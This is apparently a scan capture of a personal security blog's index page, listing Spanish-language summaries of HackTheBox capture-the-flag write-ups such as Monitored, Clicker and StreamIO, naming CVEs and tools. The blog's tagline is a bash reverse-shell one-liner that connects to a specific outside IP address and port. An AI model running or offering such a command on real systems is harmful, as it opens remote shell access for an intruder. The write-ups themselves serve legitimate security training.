sckull.github.io
Open in
urlscan Pro
2606:50c0:8003::153
Public Scan
Submitted URL: http://sckull.github.io/
Effective URL: https://sckull.github.io/
Submission: On May 23 via api from US — Scanned from DE
Effective URL: https://sckull.github.io/
Submission: On May 23 via api from US — Scanned from DE
Form analysis
0 forms found in the DOMText Content
> SCKULL ---- dark light htb * CTF * TryHackMe * HackTheBox * CyberSecLabs * Archive * Tags * Notes * About dark light htb CTF TryHackMe HackTheBox CyberSecLabs Archive Tags Notes About sckull - blog bash -i >& /dev/tcp/146.70.117.86/1337 0>&1 📌 HACKTHEBOX - MONITORED 📅 MAY 11, 2024 · ✍️ SCKULL nagios-xi snmp snmpwalk php nagios-api nagios-command nagios-plugin sqlmap CVE-2023-40931 sqlinjection En Monitored descubrimos credenciales por el servicio SNMP los cuales nos permitieron generar un token y posteriormente acceso dashboard de Nagios XI con privilegios bajos, tras explotar una vulnerabilidad SQL Injection accedimos como administrador a la API lo que nos permitio crear un usuario como administrador con el cual logramos ejecutar comandos y plugins para obtener una shell. Finalmente escalamos privilegios utilizando un script de Nagios que realiza el backup de distintos archivos. -------------------------------------------------------------------------------- 📌 HACK THE BOX - VISUAL 📅 FEB 24, 2024 · ✍️ SCKULL visual-studio git-http-server C# prebuildevent postbuildevent nishang xampp php SeImpersonatePrivilege SharpEfsPotato Visual compila un proyecto de Visual Studio segun el repositorio dado, utilizamos custom build events dentro de un proyecto para ejecutar una shell. Dentro, ejecutamos una shell en Xampp lo que nos dio acceso como Local Service, obtuvimos de vuelta el privilegio SeImpersonate para luego acceder como System por medio de SharpEfsPotato. -------------------------------------------------------------------------------- 📌 HACK THE BOX - CLICKER 📅 JAN 27, 2024 · ✍️ SCKULL nfs showmount prepared-statements php ghidra perl virtualenv web-privesc code-execution sqli En Clicker encontramos un backup del sitio en un recurso compartido, en este identificamos una vulnerabilidad de SQLi lo que nos permitio Escalar Privilegios en el sitio, asi mismo logramos la Ejecucion de Codigo PHP y a su vez Comandos lo que nos dio acceso a la maquina. Encontramos un fichero que, tras analizarlo nos permitio la lectura de archivos y el acceso a un segundo usuario. Finalmente escalamos privilegios tras modificar las variables de entorno de un script en Perl. -------------------------------------------------------------------------------- 📌 HACK THE BOX - STREAMIO 📅 SEP 17, 2022 · ✍️ SCKULL sqli time-based SQL Server python responder bloodhound bloodhound.py powershell powerview invoke-command new-PSSession ffuf kerbrute hydra mssqlclient chisel firefox LAPS out-of-band lfi rfi code injection En StreamIO descubrimos y explotamos una vulnerabilidad SQLi la cual nos permitió acceder a un panel de administración, en este ultimo encontramos una vulnerabilidad LFI, en consecuencia RFI y Code Injection lo que nos dió acceso a un primer usuario. Tras enumerar las bases de datos obtuvimos credenciales para un segundo usuario. Credenciales en un perfil de Firefox nos permitió ingresar con un tercer usuario. Finalmente con los permisos de este último realizamos la lectura de la contraseña en LAPS para acceder como administrador. -------------------------------------------------------------------------------- HACKTHEBOX - DEVVORTEX 📅 APR 27, 2024 · ✍️ SCKULL ffuf joomla CVE-2023-23752 mysql john apport-cli CVE-2023-1326 coredump En Devvortex inicialmente realizamos la explotacion de una vulnerabilidad en Joomla que nos dio acceso como Administrador y posteriormente la posibilidad de ejecucion de una shell inversa tras modificar el template. Dentro, enumeramos la base de datos donde descubrimos credenciales para un segundo usuario. Finalmente escalamos privilegios tras ejecutar una shell en el 'pager' de apport. -------------------------------------------------------------------------------- HACKTHEBOX - SURVEILLANCE 📅 APR 20, 2024 · ✍️ SCKULL craftCMS CVE-2023-41892 backup-sql zoneminder CVE-2023-26035 metasploit command-injection perl En Surveillance explotamos una vulnerabilidad en CraftCMS para acceder a la maquina, dentro, encontramos credenciales en un backup de base de datos logrando cambiar a un segundo usuario. Descubrimos ZoneMinder localmente y ademas una vulnerabilidad la cual explotamos lo que nos dio acceso a un tercer usuario. Finalmente escalamos privilegios tras analizar un script en perl donde explotamos una vulnerabilidad de Command Injection. -------------------------------------------------------------------------------- HACKTHEBOX - CODIFY 📅 APR 6, 2024 · ✍️ SCKULL nodejs sandbox-vm2 CVE-2023-32314 sqlite3 john pspy En Codify realizamos "bypass" a un sandbox vm2 lo que nos dio acceso a un primer usuario. Dentro, descubrimos una base de datos sqlite en la que obtuvimos el hash a un segundo usuario. Finalmente escalamos privilegios tras monitorear la ejecucion de un script que realizaba una conexion con MySQL. -------------------------------------------------------------------------------- HACKTHEBOX - ANALYTICS 📅 MAR 23, 2024 · ✍️ SCKULL metabase CVE-2023-38646 gameoverlay CVE-2021-3493 En Analytics encontramos que exise una vulnerabilidad en Metabase que permite la ejecucion de comandos lo que nos permitio el acceso a un primer usuario. Logramos el acceso por SSH con las credenciales en las variables de entorno. Finalmente escalamos privilegios con GameOveraly. -------------------------------------------------------------------------------- * 1 * 2 * 3 * 4 * 5 * … * 30 * -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Dany Sucuc RedTeamer & Pentester wannabe sckull Guatemala https://sckull.github.io -------------------------------------------------------------------------------- Posts * HackTheBox - Monitored * HackTheBox - Devvortex * HackTheBox - Surveillance * HackTheBox - Codify * HackTheBox - Analytics * HackTheBox - Manager -------------------------------------------------------------------------------- Categorias android 3 bsidesgt 5 challenge 11 chromeOS 1 CTF 7 cyberseclabs 1 freebsd 1 hackthebox 140 linux 184 notes 1 otro 2 owasp 2 tryhackme 94 windows 41 -------------------------------------------------------------------------------- Español English -------------------------------------------------------------------------------- ©2024, All Rights Reserved SGVsbG8gV29ybGQh